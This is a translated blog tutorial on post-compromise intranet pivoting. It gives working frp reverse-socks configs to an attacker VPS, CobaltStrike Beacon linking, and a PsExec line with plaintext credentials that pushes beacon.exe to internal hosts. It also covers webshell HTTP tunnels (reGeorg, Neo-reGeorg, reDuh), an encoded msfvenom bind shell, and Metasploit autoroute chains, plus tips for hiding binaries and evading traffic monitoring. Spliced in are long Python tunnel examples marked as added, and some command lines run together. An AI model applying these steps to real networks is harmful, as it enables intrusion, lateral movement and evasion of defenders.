
Title: Series summary of common methods for intranet penetration


Preface

In intranet penetration, obtaining a WebShell or a CobaltStrike/Metasploit session is only the beginning; most of the work is moving laterally, expanding access and reaching the core segments. The prerequisite for all of that post-exploitation work is a dedicated channel into the intranet. In practice the way that channel is built depends on the network environment the target sits in.

This article is organised by network environment: the target can reach the Internet (socks proxy), the target cannot reach the Internet (HTTP proxy), and isolated networks (multi-level proxy).

Target can reach the Internet (socks proxy)

This is the environment you most hope to meet in practice: the target can reach the Internet normally, so a socks proxy or a CobaltStrike Beacon can be run directly on the target host to open a channel into its intranet.

frp (socks5)

frp server (frps) configuration file:

[common]
bind_port = 8080

frp client (frpc) configuration file:

[common]
server_addr = xx.xx.xx.xx
# server port: use a common web port
server_port = 8080

[socks5]
type = tcp
remote_port = 8088
plugin = socks5
use_encryption = true
use_compression = true
# socks5 credentials
# plugin_user = SuperMan
# plugin_passwd = XpO2McWe6nj3

Encryption and compression are both enabled here; neither is on by default. According to the frp author, the compression algorithm is snappy. Note that with plugin_user and plugin_passwd left commented out, anyone who can reach port 8088 on the frps host can use the socks proxy into the target network; enable the credentials in practice.

use_encryption = true enables encryption: the tunnelled content is encrypted in transit, which prevents it from being read if the traffic is intercepted.

use_compression = true enables compression: the tunnelled content is compressed, which reduces the volume of traffic and speeds up forwarding at the cost of some extra CPU.

use_encryption and use_compression are per-proxy options: they go under the proxy section ([socks5] here), not under [common].

After frpc and its configuration file have been transferred to the target, rename the binary and the configuration file and place them in a system directory to reduce the chance of being noticed.

In Metasploit, point all modules at the socks proxy on the frps host via the global datastore:

setg Proxies socks5:xx.xx.xx.xx:8088

Modules run through Proxies refuse reverse-connection payloads unless ReverseAllowProxy is set to true; bind payloads or scanner modules work without it.


Comparison with and without encryption and compression

With an frpc configuration that does not enable encryption or compression, running the Metasploit ms17_010 scanner through the socks proxy produces packets in which the attack is plainly visible (the SMB exploit traffic can be identified). If the target network has situational-awareness or traffic-analysis equipment, this will be flagged and the foothold lost.


With encryption and compression enabled, the attacker's source address is still exposed, but the tunnelled packets can no longer be distinguished, which hides the activity from equipment watching the pivot host's outbound connection. Be clear about what this does and does not cover: use_encryption protects only the leg between frpc and frps. The lateral traffic that frpc then sends to internal targets (the ms17_010 packets to port 445) is sent as-is, so east-west sensors inside the intranet still see it in the clear.

CobaltStrike (socks4a)

In the Beacon console of the compromised host, start the socks server:

beacon> socks 1024    # the port opens on the team server; choose it according to your VPS

Under View > Proxy Pivots, copy the generated proxy command into Metasploit (the Tunnel button), or point other tools directly at the socks4a port.
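To make concrete what the proxy endpoint on each side actually sees, here is an added example (not from the article, frp or CobaltStrike) that frames and parses CONNECT requests for the two flavours used above: SOCKS4a, which CobaltStrike's socks command and Metasploit's socks4a module speak, and SOCKS5 with RFC 1929 username/password, which frp's socks5 plugin enables through plugin_user/plugin_passwd. The hostnames, the "cs" user id and the addresses are constructed for the demo; the credentials reuse the placeholder values from the frpc configuration above.

```python
import ipaddress
import struct

# Added example, not from the original article: the two SOCKS flavours the
# text relies on, as the pivot endpoint (frpc or the team server) sees them.


def socks4a_connect(host: str, port: int, userid: bytes = b"") -> bytes:
    """SOCKS4a CONNECT request.  The protocol has no authentication at all;
    USERID is informational.  A hostname is carried by putting 0.0.0.x in the
    IPv4 field and appending the name, so DNS resolution happens on the
    pivot side, inside the target network (the 'a' in socks4a)."""
    try:
        ip = ipaddress.IPv4Address(host)
        return struct.pack("!BBH4s", 4, 1, port, ip.packed) + userid + b"\x00"
    except ipaddress.AddressValueError:
        return (struct.pack("!BBH4s", 4, 1, port, b"\x00\x00\x00\x01")
                + userid + b"\x00" + host.encode() + b"\x00")


def socks5_connect(host: str, port: int) -> bytes:
    """SOCKS5 CONNECT (RFC 1928).  ATYP 1 = IPv4, ATYP 3 = domain name,
    the latter again meaning the proxy resolves the name remotely."""
    try:
        ip = ipaddress.IPv4Address(host)
        return struct.pack("!BBBB", 5, 1, 0, 1) + ip.packed + struct.pack("!H", port)
    except ipaddress.AddressValueError:
        name = host.encode()
        return struct.pack("!BBBBB", 5, 1, 0, 3, len(name)) + name + struct.pack("!H", port)


def socks5_userpass(user: str, password: str) -> bytes:
    """RFC 1929 username/password sub-negotiation, which is what frp's
    plugin_user/plugin_passwd turn on.  It travels in the clear on the SOCKS
    leg itself; only the frpc<->frps link (use_encryption) wraps it."""
    u, p = user.encode(), password.encode()
    return bytes([1, len(u)]) + u + bytes([len(p)]) + p


def parse_request(data: bytes) -> dict:
    """What the proxy learns from a CONNECT: destination host and port,
    and for SOCKS4/4a the user id.  Handles both versions."""
    ver = data[0]
    if ver == 4:
        _, cmd, port, raw_ip = struct.unpack("!BBH4s", data[:8])
        userid, _, tail = data[8:].partition(b"\x00")
        if raw_ip[:3] == b"\x00\x00\x00" and raw_ip[3] != 0:   # SOCKS4a marker
            host = tail.partition(b"\x00")[0].decode()
            return {"version": "4a", "host": host, "port": port, "userid": userid.decode()}
        return {"version": "4", "host": str(ipaddress.IPv4Address(raw_ip)),
                "port": port, "userid": userid.decode()}
    if ver == 5:
        atyp = data[3]
        if atyp == 1:
            host, off = str(ipaddress.IPv4Address(data[4:8])), 8
        elif atyp == 3:
            n = data[4]
            host, off = data[5:5 + n].decode(), 5 + n
        else:
            raise ValueError("unsupported ATYP")
        port = struct.unpack("!H", data[off:off + 2])[0]
        return {"version": "5", "host": host, "port": port, "atyp": atyp}
    raise ValueError("not a SOCKS request")


if __name__ == "__main__":
    # Constructed destination: a hostname, so both versions use remote DNS.
    print(parse_request(socks4a_connect("dc01.corp.local", 445, b"cs")))
    print(parse_request(socks5_connect("dc01.corp.local", 445)))
    print(socks5_userpass("SuperMan", "XpO2McWe6nj3"))
```

The practical difference this shows: a socks4a pivot (CobaltStrike, msf socks4a) cannot be protected by credentials at the protocol level, so its listening port must be firewalled to the operator's address; the frp socks5 plugin can require a username/password, but that password is only hidden from the wire by frp's own encryption.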

Hosts that cannot reach the Internet (linked Beacons)

These are chained links: when the parent Beacon disconnects, every Beacon linked through it is lost as well.

SMB Beacon

Official description of the SMB Beacon: the SMB Beacon uses a named pipe to communicate through a parent Beacon. When two Beacons are linked, the child Beacon gets its tasks from the parent and sends its output back through it. Because linked Beacons communicate over Windows named pipes, the traffic is encapsulated in the SMB protocol, which makes the SMB Beacon relatively inconspicuous. It still requires port 445 to be reachable between the two hosts, so a host firewall blocking SMB breaks the link.

Create an SMB listener (host and port are irrelevant for it). When spawning, choose the listener carefully, and spawn from a session on a host that can route to the target.

(Create the SMB listener under Listeners, then right-click the session, choose Spawn, and select that listener.)


On success the session list shows ∞∞ next to the new session, which marks a linked SMB Beacon.


From the parent Beacon, link and unlink a host with:

beacon> link 192.168.144.155
beacon> unlink 192.168.144.155

Link Listener

Create a listener on the host that is already online. Judging by the netstat check at the end of this section, it is a bind-type listener on port 4444.

Generate the executable or DLL for this listener type.

Select the listener you just created.

Upload the payload just generated to the currently online host, together with PsExec.exe. (CobaltStrike's own psexec function is not powerful enough for this.)

From the Beacon, use PsExec to copy the payload to the hosts that cannot reach the Internet and execute it there, so they come online through the online host:

beacon> shell C:\WINDOWS\Temp\PsExec.exe -accepteula \\192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:\WINDOWS\Temp\beacon.exe

Here -c copies the binary to each remote host before running it and -d returns without waiting for it to exit. If the listener is a bind-type TCP Beacon, the parent Beacon then has to link to it explicitly with connect 192.168.144.155 4444. Confirm on the new host that the bind port is listening:

beacon> shell netstat -ano | findstr 4444

SSH Login

beacon> ssh 192.168.144.174:22 root admin
beacon> ssh 192.168.144.203:22 root admin

Checking the network connections on the Linux targets shows the SSH session coming from the Windows host that was already online, because the SSH session is opened by that Beacon and tunnelled through it.

Target cannot reach the Internet (HTTP proxy)

Firewalls, gateways or similar devices in the target network may prevent the host from initiating any connection to the Internet, so none of the socks methods above can be used. What remains is the HTTP path you already have to the web application: the tunnel is carried inside HTTP requests that the attacker sends to a server-side script (a webshell), and the web server makes the connections into the intranet on the attacker's behalf.

reGeorg (socks5)

python reGeorgSocksProxy.py -u http://192.168.144.211/tunnel.aspx -l 0.0.0.0 -p 10080

-l 0.0.0.0 binds the local socks listener on all interfaces and reGeorg's listener has no authentication, so bind it to 127.0.0.1 unless other hosts really need to use it.

Running the Metasploit ms17_010 scanner through the reGeorg socks proxy again produces traffic in which the attack behaviour is plainly identifiable.

Neo-reGeorg (encrypted)

python neoreg.py -k test@123 -l 0.0.0.0 -p 10081 -u http://192.168.144.211/neo-tunnel.aspx

The server-side script has to be generated with the same key beforehand (python neoreg.py generate -k test@123). With Neo-reGeorg the tunnelled data is encrypted in transit.
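As an added illustration that is not reGeorg's code or its exact wire format, the following stripped-down HTTP tunnel shows the mechanism reGeorg and Neo-reGeorg rely on: a handler on the web server (standing in for tunnel.aspx) opens TCP sockets into the intranet on request, and the attacker side drives each socket with a series of POSTs, so the web server never has to connect out. The header names (X-Cmd, X-Session, X-Target, X-Port), the session handling and the banner-grab target are all assumptions of this example, and everything runs on 127.0.0.1 so it is self-contained. The request bodies travel as plain bytes, which is exactly why reGeorg's traffic is recognisable and why Neo-reGeorg adds a key.

```python
import http.server
import socket
import socketserver
import threading
import urllib.request
import uuid

# Added example, not reGeorg's source or protocol: a minimal HTTP-carried
# TCP tunnel.  TunnelHandler stands in for the server-side script,
# TunnelClient for the attacker-side proxy.

SESSIONS = {}   # session id -> TCP socket kept open on the web server side


class TunnelHandler(http.server.BaseHTTPRequestHandler):
    def log_message(self, *args):          # keep the demo quiet
        pass

    def do_POST(self):
        cmd = self.headers["X-Cmd"]
        sid = self.headers.get("X-Session", "")
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        out = b""
        if cmd == "CONNECT":               # the web server dials the internal host
            s = socket.create_connection((self.headers["X-Target"], int(self.headers["X-Port"])))
            s.settimeout(0.5)
            sid = uuid.uuid4().hex
            SESSIONS[sid] = s
        elif cmd == "FORWARD":             # attacker -> target bytes ride in the request body
            SESSIONS[sid].sendall(body)
        elif cmd == "READ":                # target -> attacker bytes ride in the response body
            try:
                out = SESSIONS[sid].recv(4096)
            except socket.timeout:
                out = b""
        elif cmd == "DISCONNECT":
            SESSIONS.pop(sid).close()
        self.send_response(200)
        self.send_header("X-Session", sid)
        self.send_header("Content-Length", str(len(out)))
        self.end_headers()
        self.wfile.write(out)


# Ignore any http_proxy in the environment so the demo talks to 127.0.0.1 directly.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class TunnelClient:
    """Attacker side: turns one TCP stream into a sequence of POSTs."""

    def __init__(self, url):
        self.url, self.sid = url, ""

    def _post(self, cmd, body=b"", **extra):
        headers = {"X-Cmd": cmd, "X-Session": self.sid, **extra}
        req = urllib.request.Request(self.url, data=body, method="POST", headers=headers)
        with OPENER.open(req) as resp:
            self.sid = resp.headers["X-Session"]
            return resp.read()

    def connect(self, host, port):
        self._post("CONNECT", **{"X-Target": host, "X-Port": str(port)})

    def send(self, data):
        self._post("FORWARD", data)

    def read(self, tries=10):
        for _ in range(tries):             # poll; a real tool keeps a READ loop running
            data = self._post("READ")
            if data:
                return data
        return b""

    def close(self):
        self._post("DISCONNECT")


class _Banner(socketserver.BaseRequestHandler):
    """Stand-in internal service that greets on connect (constructed banner)."""

    def handle(self):
        self.request.sendall(b"SSH-2.0-OpenSSH_8.9 (lab)\r\n")


def _start(server):
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server.server_address[1]


def demo() -> bytes:
    """Grab a banner from an 'internal' service through the HTTP tunnel."""
    web_port = _start(http.server.ThreadingHTTPServer(("127.0.0.1", 0), TunnelHandler))
    svc_port = _start(socketserver.ThreadingTCPServer(("127.0.0.1", 0), _Banner))
    c = TunnelClient(f"http://127.0.0.1:{web_port}/tunnel.aspx")
    c.connect("127.0.0.1", svc_port)
    banner = c.read()
    c.close()
    return banner


if __name__ == "__main__":
    print(demo())
```

Every round trip to the internal host costs at least one HTTP request, which is why these tunnels are slow and why scanners with many threads (the Metasploit scans above) stress them; it is also why a server-side script that keeps sockets open in a dictionary like SESSIONS needs the runtime to actually support that, the limitation the reDuh section below runs into.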

Ice Scorpion (Behinder, built-in socks5)

Ice Scorpion (Behinder) encrypts its traffic and also provides a socks proxy, but packets are lost during transmission. Checking for ms17_010 with Metasploit through it reported the vulnerability as absent, whereas the same check without the proxy showed that it does exist.

So although scanning through Behinder's proxy is less accurate than through reGeorg, port detection with a small number of threads is workable, for example auxiliary/scanner/portscan/tcp. Accuracy depends mainly on how many packets a given check needs and how they are transmitted.

reDuh (single-port forwarding)

reDuh usage: https://blog.csdn.net/nzjdsds/article/details/82930774

When the middleware or runtime on the target server is too old for the reGeorg or Behinder server-side script to run, another HTTP tunnelling script is needed; the author met exactly this situation in a real engagement.

reDuh serves as the example here. It only forwards a single specified port (so it is not suitable for interactive graphical connections), but you can first generate a bind-shell payload with msfvenom, bring it into Metasploit through reDuh's single-port forward, and then start the socks4a module to get a full proxy.

The steps in detail:

sudo msfvenom --platform windows -p windows/shell_bind_tcp lport=53 -e x86/shikata_ga_nai -i 5 -f exe -o x86shell.exe
# --platform        target platform of the payload
# -e, --encoder     encoder to use
# -i, --iterations  number of encoding passes

This is a bind shell listening on port 53 of the target, with no authentication: anyone who can reach that port gets a shell, so keep the window between starting it and connecting as short as possible.

Upload the payload to the target server and execute.


metasploit is the address and port after listening for forwarding.

sudo msfconsole -qmsf5 use exploit/multi/handlermsf5 exploit(multi/handler) setpayload windows/shell_bind_tcpmsf5 exploit(multi/handler) setrhost 127.0.0.1msf5 exploit(multi/handler) setlport 5353msf5 exploit(multi/handler) run -j

1049983-20230224142604758-483591403.png

java -jar reDuhClient.jar http://103.242.xx.xx/reduh.aspxtelnet 127.0.0.1 1010[createTunnel]5353:127.0.0.1:53 1049983-20230224142605953-743617388.png

From here you can continue in Metasploit directly, or start a socks4a server and attach other tools to it:

msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 10080
msf5 auxiliary(server/socks4a) > run -j

(In Metasploit 6 the socks4a and socks5 modules were merged into auxiliary/server/socks_proxy, with the protocol chosen through its VERSION option.)

Note

Why use a shell payload instead of Meterpreter? Meterpreter is a heavyweight payload that transfers a lot of data during staging, and this single-port forward is not very stable to begin with. Meterpreter would make the "narrow pipe" even less stable.

Isolated networks (multi-level proxy)

Intranets often contain isolated networks, usually separated logically. The way through is to gain control of a springboard host that can route into them (a dual-NIC server, an operations host and so on) and build a first-, second- and, if necessary, third-level proxy on it.

frp

Once you hold a dual-NIC intranet server, frp can build the channel through it: this server runs both frps (for the hosts behind it) and frpc (towards the outer frps on the VPS).

(For details see https://www.cnblogs.com/PANDA-Mosen/p/13096260.html)

Proxifier

With the frp chain in place, add two proxies in Proxifier, the external socks and the internal socks, and then create a proxy chain from them. (Mind the order: the proxy reachable from your machine comes first, the deeper one after it.)

Set proxy rules and select the corresponding proxy.

The second-level proxy works: port 445 on the host inside the isolated segment is detected as open.

Proxychains

proxychains is the command-line counterpart: configure both hops, including the socks password, in /etc/proxychains.conf under [ProxyList]. (Again mind the order: the hop reachable from the attacker first, the deeper hop after it.)

Chaining Metasploit through it and running the ms17_010 check shows the traffic passing along the proxy chain.

With Metasploit itself, multi-level penetration is even more convenient: as long as a route to the segment is registered against a session, modules reach it directly. But if the main session drops, everything behind it drops too.

After obtaining a session on the target, view its subnets and add routes automatically:

msf5 exploit(multi/handler) > sessions 1
meterpreter > run get_local_subnets
meterpreter > run autoroute -p
meterpreter > run post/multi/manage/autoroute
meterpreter > run autoroute -p
meterpreter > background

The above adds routes from inside Meterpreter; when the target's routing information is already known, a route can be added directly:

msf5 exploit(multi/handler) > route add 172.20.20.0/24 1    # 1 is the session id
msf5 exploit(multi/handler) > route

You can continue within Metasploit, or start a socks server and attach other tools to it for multi-level penetration:

msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 1080
msf5 auxiliary(server/socks4a) > run -j

and then add that proxy to /etc/proxychains.conf.
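As an added example (not from the article, proxychains or frp), the following code builds the same kind of proxy chain entirely in-process: two minimal SOCKS5 servers stand in for the outer hop (the VPS) and the inner hop (the dual-NIC pivot), a small echo service plays the host in the isolated segment, and the client does what proxychains' strict_chain does with its [ProxyList]. It connects to the first hop, asks it to CONNECT to the second, performs the second hop's handshake inside that tunnel, and only then requests the real target, which is why the order of the entries matters. The addresses, ports and echo service are constructed for the demo; the servers support CONNECT to IPv4 with no authentication only.

```python
import socket
import struct
import threading

# Added example, not code from the article or from proxychains/frp: a toy
# SOCKS5 server and a client that chains through several of them in order.


def _recv_exact(s: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        part = s.recv(n - len(buf))
        if not part:
            raise ConnectionError("peer closed")
        buf += part
    return buf


def _relay(a: socket.socket, b: socket.socket) -> None:
    """Copy bytes both ways; propagate each side's EOF as a half-close."""
    def pump(src, dst):
        try:
            while True:
                chunk = src.recv(4096)
                if not chunk:
                    break
                dst.sendall(chunk)
        except OSError:
            pass
        finally:
            try:
                dst.shutdown(socket.SHUT_WR)
            except OSError:
                pass
    t = threading.Thread(target=pump, args=(a, b), daemon=True)
    t.start()
    pump(b, a)
    t.join()
    a.close()
    b.close()


def _handle_socks5(client: socket.socket) -> None:
    """Minimal RFC 1928 server: no-auth, CONNECT, IPv4 destinations only."""
    _, nmeth = _recv_exact(client, 2)
    _recv_exact(client, nmeth)
    client.sendall(b"\x05\x00")                            # NO AUTHENTICATION REQUIRED
    _, cmd, _, atyp = _recv_exact(client, 4)
    if cmd != 1 or atyp != 1:
        client.sendall(b"\x05\x07\x00\x01" + b"\x00" * 6)  # command not supported
        client.close()
        return
    host = socket.inet_ntoa(_recv_exact(client, 4))
    port = struct.unpack("!H", _recv_exact(client, 2))[0]
    try:
        upstream = socket.create_connection((host, port))
    except OSError:
        client.sendall(b"\x05\x05\x00\x01" + b"\x00" * 6)  # connection refused
        client.close()
        return
    client.sendall(b"\x05\x00\x00\x01" + b"\x00" * 6)      # succeeded
    _relay(client, upstream)


def _echo(c: socket.socket) -> None:
    """Stand-in host in the isolated segment: echoes what it receives."""
    data = b""
    while True:
        part = c.recv(4096)
        if not part:
            break
        data += part
    c.sendall(b"echo:" + data)
    c.close()


def serve(handler) -> int:
    """Start a threaded TCP service on 127.0.0.1 and return its port."""
    ls = socket.socket()
    ls.bind(("127.0.0.1", 0))
    ls.listen()

    def loop():
        while True:
            c, _ = ls.accept()
            threading.Thread(target=handler, args=(c,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return ls.getsockname()[1]


def socks5_connect_through(s: socket.socket, host: str, port: int) -> None:
    """Run the SOCKS5 handshake on an already-open stream and request CONNECT."""
    s.sendall(b"\x05\x01\x00")
    if _recv_exact(s, 2) != b"\x05\x00":
        raise ConnectionError("hop refused no-auth")
    s.sendall(b"\x05\x01\x00\x01" + socket.inet_aton(host) + struct.pack("!H", port))
    rep = _recv_exact(s, 10)
    if rep[1] != 0:
        raise ConnectionError(f"CONNECT failed, REP={rep[1]}")


def chain_send(hops, target, payload: bytes) -> bytes:
    """strict_chain: hops[0] must be reachable from here; every later hop is
    reached through the tunnel the previous one opened."""
    s = socket.create_connection(hops[0])
    for nxt in list(hops[1:]) + [target]:
        socks5_connect_through(s, *nxt)
    s.sendall(payload)
    s.shutdown(socket.SHUT_WR)
    out = b""
    while True:
        part = s.recv(4096)
        if not part:
            break
        out += part
    s.close()
    return out


def demo() -> bytes:
    outer = ("127.0.0.1", serve(_handle_socks5))   # e.g. frps on the VPS
    inner = ("127.0.0.1", serve(_handle_socks5))   # e.g. the dual-NIC pivot
    target = ("127.0.0.1", serve(_echo))           # host in the isolated segment
    return chain_send([outer, inner], target, b"hello")


if __name__ == "__main__":
    print(demo())
```

Swapping the two hops in chain_send would make the client try to reach the inner pivot directly, which in the real topology is not routable from the attacker, so the first CONNECT would fail with a refused reply; that is the failure you see when a proxychains [ProxyList] is in the wrong order.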

Original link: https://www.cnblogs.com/yokan/p/14057794.html
